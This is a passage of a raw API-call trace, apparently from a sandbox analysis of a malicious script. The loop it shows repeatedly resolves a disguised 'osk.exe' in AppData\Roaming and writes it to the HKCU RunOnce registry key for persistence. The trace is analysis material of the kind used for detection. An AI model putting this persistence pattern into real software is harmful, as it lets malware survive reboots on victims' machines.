ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.140] IUnknown:Release (This=0x787518) returned 0x1 [0092.140] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.140] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.141] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.141] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.141] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0092.141] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.141] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x70 [0092.141] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.142] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0092.142] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.143] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.143] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.143] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.143] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.143] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.143] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.143] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.143] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.143] RegCloseKey (hKey=0x280) returned 0x0 [0092.144] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.144] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.144] SetTimer (hWnd=0x20280, nIDEvent=0x21eb, uElapse=0xa, lpTimerFunc=0x0) returned 0x21eb [0092.144] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.155] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.155] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.155] KillTimer (hWnd=0x20280, uIDEvent=0x21eb) returned 1 [0092.155] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.155] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.155] IUnknown:Release (This=0x787518) returned 0x1 [0092.156] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.156] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.156] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.156] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.156] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0092.156] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.156] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x71 [0092.156] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.157] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0092.157] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.158] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.158] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.158] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.158] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.158] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.158] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.158] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.158] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.158] RegCloseKey (hKey=0x280) returned 0x0 [0092.158] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.159] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.159] SetTimer (hWnd=0x20280, nIDEvent=0x21ec, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ec [0092.159] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.192] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.192] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.192] KillTimer (hWnd=0x20280, uIDEvent=0x21ec) returned 1 [0092.192] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.192] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.192] IUnknown:Release (This=0x787518) returned 0x1 [0092.193] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.193] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.193] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.193] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.194] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0092.194] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.194] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x72 [0092.194] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.195] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0092.195] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.195] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.195] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.195] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.195] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.195] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.195] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.196] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.196] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.196] RegCloseKey (hKey=0x280) returned 0x0 [0092.196] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.196] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.196] SetTimer (hWnd=0x20280, nIDEvent=0x21ed, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ed [0092.196] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.202] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.202] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.202] KillTimer (hWnd=0x20280, uIDEvent=0x21ed) returned 1 [0092.202] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.202] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.203] IUnknown:Release (This=0x787518) returned 0x1 [0092.203] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.203] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.203] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.203] 